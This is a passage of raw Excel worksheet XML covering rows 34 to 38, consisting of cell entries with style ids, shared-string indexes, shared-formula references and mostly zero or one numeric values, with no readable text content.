      <c r="BT34" s="83"/>
      <c r="BU34" s="83"/>
      <c r="BV34" s="83"/>
      <c r="BW34" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX34" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY34" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ34" s="85" t="s">
        <v>481</v>
      </c>
      <c r="CA34" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB34" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC34" s="85"/>
      <c r="CD34" s="85"/>
      <c r="CE34" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF34" s="85"/>
      <c r="CG34" s="85"/>
      <c r="CH34" s="85"/>
      <c r="CI34" s="85"/>
      <c r="CJ34" s="86"/>
      <c r="CK34" s="86"/>
      <c r="CL34" s="86"/>
      <c r="CM34" s="86">
        <v>0.0</v>
      </c>
      <c r="CN34" s="86"/>
      <c r="CO34" s="86"/>
      <c r="CP34" s="86"/>
      <c r="CQ34" s="86"/>
      <c r="CR34" s="86"/>
      <c r="CS34" s="86"/>
      <c r="CT34" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU34" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV34" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW34" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX34" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY34" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ34" s="88"/>
      <c r="DA34" s="88"/>
      <c r="DB34" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC34" s="88"/>
      <c r="DD34" s="88"/>
      <c r="DE34" s="88"/>
      <c r="DF34" s="88"/>
      <c r="DG34" s="89"/>
      <c r="DH34" s="89"/>
      <c r="DI34" s="89"/>
      <c r="DJ34" s="89">
        <v>0.0</v>
      </c>
      <c r="DK34" s="89"/>
      <c r="DL34" s="89"/>
      <c r="DM34" s="89"/>
      <c r="DN34" s="89"/>
      <c r="DO34" s="89"/>
      <c r="DP34" s="89"/>
      <c r="DQ34" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR34" s="91"/>
      <c r="DS34" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT34" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU34" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA34" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB34" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC34" s="74">
        <v>0.0</v>
      </c>
      <c r="ED34" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE34" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="35" ht="153.75" customHeight="1">
      <c r="B35" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C35" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D35" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E35" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F35" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G35" s="72" t="s">
        <v>482</v>
      </c>
      <c r="H35" s="72" t="s">
        <v>483</v>
      </c>
      <c r="I35" s="73" t="s">
        <v>484</v>
      </c>
      <c r="J35" s="73" t="s">
        <v>485</v>
      </c>
      <c r="K35" s="73" t="s">
        <v>486</v>
      </c>
      <c r="L35" s="74">
        <v>1.0</v>
      </c>
      <c r="M35" s="74">
        <v>1.0</v>
      </c>
      <c r="N35" s="74">
        <v>1.0</v>
      </c>
      <c r="O35" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P35" s="74">
        <v>1.0</v>
      </c>
      <c r="Q35" s="74">
        <v>0.0</v>
      </c>
      <c r="R35" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S35" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T35" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U35" s="77" t="s">
        <v>487</v>
      </c>
      <c r="V35" s="76" t="s">
        <v>488</v>
      </c>
      <c r="W35" s="76" t="s">
        <v>489</v>
      </c>
      <c r="X35" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y35" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z35" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA35" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB35" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC35" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD35" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE35" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF35" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG35" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH35" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI35" s="78"/>
      <c r="AJ35" s="78"/>
      <c r="AK35" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL35" s="78"/>
      <c r="AM35" s="78"/>
      <c r="AN35" s="78"/>
      <c r="AO35" s="78"/>
      <c r="AP35" s="80"/>
      <c r="AQ35" s="80"/>
      <c r="AR35" s="80"/>
      <c r="AS35" s="80">
        <v>0.0</v>
      </c>
      <c r="AT35" s="80"/>
      <c r="AU35" s="80"/>
      <c r="AV35" s="80"/>
      <c r="AW35" s="80"/>
      <c r="AX35" s="80"/>
      <c r="AY35" s="80"/>
      <c r="AZ35" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA35" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB35" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC35" s="82" t="s">
        <v>481</v>
      </c>
      <c r="BD35" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE35" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF35" s="82"/>
      <c r="BG35" s="82"/>
      <c r="BH35" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI35" s="82"/>
      <c r="BJ35" s="82"/>
      <c r="BK35" s="82"/>
      <c r="BL35" s="82"/>
      <c r="BM35" s="83"/>
      <c r="BN35" s="83"/>
      <c r="BO35" s="83"/>
      <c r="BP35" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ35" s="83"/>
      <c r="BR35" s="83"/>
      <c r="BS35" s="83"/>
      <c r="BT35" s="83"/>
      <c r="BU35" s="83"/>
      <c r="BV35" s="83"/>
      <c r="BW35" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX35" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY35" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ35" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA35" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB35" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC35" s="85"/>
      <c r="CD35" s="85"/>
      <c r="CE35" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF35" s="85"/>
      <c r="CG35" s="85"/>
      <c r="CH35" s="85"/>
      <c r="CI35" s="85"/>
      <c r="CJ35" s="86"/>
      <c r="CK35" s="86"/>
      <c r="CL35" s="86"/>
      <c r="CM35" s="86">
        <v>0.0</v>
      </c>
      <c r="CN35" s="86"/>
      <c r="CO35" s="86"/>
      <c r="CP35" s="86"/>
      <c r="CQ35" s="86"/>
      <c r="CR35" s="86"/>
      <c r="CS35" s="86"/>
      <c r="CT35" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU35" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV35" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW35" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX35" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY35" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ35" s="88"/>
      <c r="DA35" s="88"/>
      <c r="DB35" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC35" s="88"/>
      <c r="DD35" s="88"/>
      <c r="DE35" s="88"/>
      <c r="DF35" s="88"/>
      <c r="DG35" s="89"/>
      <c r="DH35" s="89"/>
      <c r="DI35" s="89"/>
      <c r="DJ35" s="89">
        <v>0.0</v>
      </c>
      <c r="DK35" s="89"/>
      <c r="DL35" s="89"/>
      <c r="DM35" s="89"/>
      <c r="DN35" s="89"/>
      <c r="DO35" s="89"/>
      <c r="DP35" s="89"/>
      <c r="DQ35" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR35" s="91"/>
      <c r="DS35" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT35" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU35" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA35" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB35" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC35" s="74">
        <v>0.0</v>
      </c>
      <c r="ED35" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE35" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="36" ht="153.75" customHeight="1">
      <c r="B36" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C36" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D36" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E36" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F36" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G36" s="72" t="s">
        <v>492</v>
      </c>
      <c r="H36" s="72" t="s">
        <v>493</v>
      </c>
      <c r="I36" s="73" t="s">
        <v>494</v>
      </c>
      <c r="J36" s="73" t="s">
        <v>495</v>
      </c>
      <c r="K36" s="73" t="s">
        <v>496</v>
      </c>
      <c r="L36" s="74">
        <v>1.0</v>
      </c>
      <c r="M36" s="74">
        <v>1.0</v>
      </c>
      <c r="N36" s="74">
        <v>1.0</v>
      </c>
      <c r="O36" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P36" s="74">
        <v>1.0</v>
      </c>
      <c r="Q36" s="74">
        <v>0.0</v>
      </c>
      <c r="R36" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S36" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T36" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U36" s="77" t="s">
        <v>497</v>
      </c>
      <c r="V36" s="76" t="s">
        <v>498</v>
      </c>
      <c r="W36" s="76" t="s">
        <v>499</v>
      </c>
      <c r="X36" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y36" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z36" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA36" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB36" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC36" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD36" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE36" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF36" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG36" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH36" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI36" s="78"/>
      <c r="AJ36" s="78"/>
      <c r="AK36" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL36" s="78"/>
      <c r="AM36" s="78"/>
      <c r="AN36" s="78"/>
      <c r="AO36" s="78"/>
      <c r="AP36" s="80"/>
      <c r="AQ36" s="80"/>
      <c r="AR36" s="80"/>
      <c r="AS36" s="80">
        <v>0.0</v>
      </c>
      <c r="AT36" s="80"/>
      <c r="AU36" s="80"/>
      <c r="AV36" s="80"/>
      <c r="AW36" s="80"/>
      <c r="AX36" s="80"/>
      <c r="AY36" s="80"/>
      <c r="AZ36" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA36" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB36" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC36" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD36" s="79" t="s">
        <v>481</v>
      </c>
      <c r="BE36" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF36" s="82"/>
      <c r="BG36" s="82"/>
      <c r="BH36" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI36" s="82"/>
      <c r="BJ36" s="82"/>
      <c r="BK36" s="82"/>
      <c r="BL36" s="82"/>
      <c r="BM36" s="83"/>
      <c r="BN36" s="83"/>
      <c r="BO36" s="83"/>
      <c r="BP36" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ36" s="83"/>
      <c r="BR36" s="83"/>
      <c r="BS36" s="83"/>
      <c r="BT36" s="83"/>
      <c r="BU36" s="83"/>
      <c r="BV36" s="83"/>
      <c r="BW36" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX36" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY36" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ36" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA36" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB36" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC36" s="85"/>
      <c r="CD36" s="85"/>
      <c r="CE36" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF36" s="85"/>
      <c r="CG36" s="85"/>
      <c r="CH36" s="85"/>
      <c r="CI36" s="85"/>
      <c r="CJ36" s="86"/>
      <c r="CK36" s="86"/>
      <c r="CL36" s="86"/>
      <c r="CM36" s="86">
        <v>0.0</v>
      </c>
      <c r="CN36" s="86"/>
      <c r="CO36" s="86"/>
      <c r="CP36" s="86"/>
      <c r="CQ36" s="86"/>
      <c r="CR36" s="86"/>
      <c r="CS36" s="86"/>
      <c r="CT36" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU36" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV36" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW36" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX36" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY36" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ36" s="88"/>
      <c r="DA36" s="88"/>
      <c r="DB36" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC36" s="88"/>
      <c r="DD36" s="88"/>
      <c r="DE36" s="88"/>
      <c r="DF36" s="88"/>
      <c r="DG36" s="89"/>
      <c r="DH36" s="89"/>
      <c r="DI36" s="89"/>
      <c r="DJ36" s="89">
        <v>0.0</v>
      </c>
      <c r="DK36" s="89"/>
      <c r="DL36" s="89"/>
      <c r="DM36" s="89"/>
      <c r="DN36" s="89"/>
      <c r="DO36" s="89"/>
      <c r="DP36" s="89"/>
      <c r="DQ36" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR36" s="91"/>
      <c r="DS36" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT36" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU36" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA36" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB36" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC36" s="74">
        <v>0.0</v>
      </c>
      <c r="ED36" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE36" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="37" ht="153.75" customHeight="1">
      <c r="B37" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C37" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D37" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E37" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F37" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G37" s="72" t="s">
        <v>492</v>
      </c>
      <c r="H37" s="72" t="s">
        <v>493</v>
      </c>
      <c r="I37" s="73" t="s">
        <v>500</v>
      </c>
      <c r="J37" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K37" s="73" t="s">
        <v>501</v>
      </c>
      <c r="L37" s="74">
        <v>1.0</v>
      </c>
      <c r="M37" s="74">
        <v>1.0</v>
      </c>
      <c r="N37" s="74">
        <v>1.0</v>
      </c>
      <c r="O37" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P37" s="74">
        <v>1.0</v>
      </c>
      <c r="Q37" s="74">
        <v>0.0</v>
      </c>
      <c r="R37" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S37" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T37" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U37" s="77" t="s">
        <v>502</v>
      </c>
      <c r="V37" s="76" t="s">
        <v>503</v>
      </c>
      <c r="W37" s="76" t="s">
        <v>504</v>
      </c>
      <c r="X37" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y37" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z37" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA37" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB37" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC37" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD37" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE37" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF37" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG37" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH37" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI37" s="78"/>
      <c r="AJ37" s="78"/>
      <c r="AK37" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL37" s="78"/>
      <c r="AM37" s="78"/>
      <c r="AN37" s="78"/>
      <c r="AO37" s="78"/>
      <c r="AP37" s="80"/>
      <c r="AQ37" s="80"/>
      <c r="AR37" s="80"/>
      <c r="AS37" s="80">
        <v>0.0</v>
      </c>
      <c r="AT37" s="80"/>
      <c r="AU37" s="80"/>
      <c r="AV37" s="80"/>
      <c r="AW37" s="80"/>
      <c r="AX37" s="80"/>
      <c r="AY37" s="80"/>
      <c r="AZ37" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA37" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB37" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC37" s="82" t="s">
        <v>481</v>
      </c>
      <c r="BD37" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE37" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF37" s="82"/>
      <c r="BG37" s="82"/>
      <c r="BH37" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI37" s="82"/>
      <c r="BJ37" s="82"/>
      <c r="BK37" s="82"/>
      <c r="BL37" s="82"/>
      <c r="BM37" s="83"/>
      <c r="BN37" s="83"/>
      <c r="BO37" s="83"/>
      <c r="BP37" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ37" s="83"/>
      <c r="BR37" s="83"/>
      <c r="BS37" s="83"/>
      <c r="BT37" s="83"/>
      <c r="BU37" s="83"/>
      <c r="BV37" s="83"/>
      <c r="BW37" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX37" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY37" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ37" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA37" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB37" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC37" s="85"/>
      <c r="CD37" s="85"/>
      <c r="CE37" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF37" s="85"/>
      <c r="CG37" s="85"/>
      <c r="CH37" s="85"/>
      <c r="CI37" s="85"/>
      <c r="CJ37" s="86"/>
      <c r="CK37" s="86"/>
      <c r="CL37" s="86"/>
      <c r="CM37" s="86">
        <v>0.0</v>
      </c>
      <c r="CN37" s="86"/>
      <c r="CO37" s="86"/>
      <c r="CP37" s="86"/>
      <c r="CQ37" s="86"/>
      <c r="CR37" s="86"/>
      <c r="CS37" s="86"/>
      <c r="CT37" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU37" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV37" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW37" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX37" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY37" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ37" s="88"/>
      <c r="DA37" s="88"/>
      <c r="DB37" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC37" s="88"/>
      <c r="DD37" s="88"/>
      <c r="DE37" s="88"/>
      <c r="DF37" s="88"/>
      <c r="DG37" s="89"/>
      <c r="DH37" s="89"/>
      <c r="DI37" s="89"/>
      <c r="DJ37" s="89">
        <v>0.0</v>
      </c>
      <c r="DK37" s="89"/>
      <c r="DL37" s="89"/>
      <c r="DM37" s="89"/>
      <c r="DN37" s="89"/>
      <c r="DO37" s="89"/>
      <c r="DP37" s="89"/>
      <c r="DQ37" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR37" s="91"/>
      <c r="DS37" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT37" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU37" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA37" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB37" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC37" s="74">
        <v>0.0</v>
      </c>
      <c r="ED37" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE37" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="38" ht="153.75" customHeight="1">
      <c r="B38" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C38" s="72" t="s">
        <v>505</v>
      </c>
      <c r="D38" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E38" s="72" t="s">
        <v>506</v>
      </c>
      <c r="F38" s="72" t="s">
        <v>507</v>
      </c>
      <c r="G38" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H38" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I38" s="73" t="s">
        <v>508</v>
      </c>
      <c r="J38" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K38" s="73" t="s">
        <v>509</v>
      </c>
      <c r="L38" s="74">
        <v>1.0</v>
      </c>
      <c r="M38" s="74">
        <v>1.0</v>
      </c>
      <c r="N38" s="74">
        <v>1.0</v>
      </c>
      <c r="O38" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P38" s="74">
        <v>1.0</v>
      </c>
      <c r="Q38" s="74">
        <v>0.0</v>
      </c>
      <c r="R38" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S38" s="76" t="s">
        <v>510</v>
      </c>
      <c r="T38" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U38" s="77" t="s">
        <v>511</v>
      </c>
      <c r="V38" s="76" t="s">
        <v>512</v>
      </c>
      <c r="W38" s="76" t="s">
        <v>513</v>
      </c>
      <c r="X38" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y38" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z38" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA38" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB38" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC38" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD38" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE38" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF38" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG38" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH38" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI38" s="78"/>
      <c r="AJ38" s="78"/>
      <c r="AK38" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL38" s="78"/>
      <c r="AM38" s="78"/>
      <c r="AN38" s="78"/>
      <c r="AO38" s="78"/>
      <c r="AP38" s="80"/>
      <c r="AQ38" s="80"/>
      <c r="AR38" s="80"/>
      <c r="AS38" s="80">
        <v>0.0</v>
      </c>
      <c r="AT38" s="80"/>
      <c r="AU38" s="80"/>
      <c r="AV38" s="80"/>
      <c r="AW38" s="80"/>
      <c r="AX38" s="80"/>
      <c r="AY38" s="80"/>
      <c r="AZ38" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA38" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB38" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC38" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD38" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE38" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF38" s="82"/>
      <c r="BG38" s="82"/>
      <c r="BH38" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI38" s="82"/>
      <c r="BJ38" s="82"/>
      <c r="BK38" s="82"/>
      <c r="BL38" s="82"/>
      <c r="BM38" s="83"/>
      <c r="BN38" s="83"/>
      <c r="BO38" s="83"/>
      <c r="BP38" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ38" s="83"/>
      <c r="BR38" s="83"/>
      <c r="BS38" s="83"/>
      <c r="BT38" s="83"/>
      <c r="BU38" s="83"/>
      <c r="BV38" s="83"/>
      <c r="BW38" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX38" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY38" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ38" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA38" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB38" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC38" s="85"/>
      <c r="CD38" s="85"/>
      <c r="CE38" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF38" s="85"/>
      <c r="CG38" s="85"/>
      <c r="CH38" s="85"/>
      <c r="CI38" s="85"/>
      <c r="CJ38" s="86"/>
      <c r="CK38" s="86"/>
      <c r="CL38" s="86"/>
      <c r="CM38" s="86">
        <v>0.0</v>
      </c>
      <c r="CN38" s="86"/>
      <c r="CO38" s="86"/>
      <c r="CP38" s="86"/>
      <c r="CQ38" s="86"/>
      <c r="CR38" s="86"/>
      <c r="CS38" s="86"/>
      <c r="CT38" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU38" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV38" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW38" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX38" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY38" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ38" s="88"/>
      <c r="DA38" s="88"/>
      <c r="DB38" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC38" s="88"/>
      <c r="DD38" s="88"/>
      <c r="DE38" s="88"/>
      <c r="DF38" s="88"/>
      <c r="DG38" s="89"/>
      <c r="DH38" s="89"/>
      <c r="DI38" s="89"/>
      <c r="DJ38" s="89">
        <v>0.0</v>
      </c>
      <c r="DK38" s="89"/>
      <c r="DL38" s="89"/>
      <c r="DM38" s="89"/>
      <c r="DN38" s="89"/>
      <c r="DO38" s="89"/>
      <c r="DP38" s="89"/>
      <c r="DQ38" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR38" s="91"/>
      <c r="DS38" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT38" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU38" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV38" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW38" s="94" t="s">
        <v>12</v>
      </c>
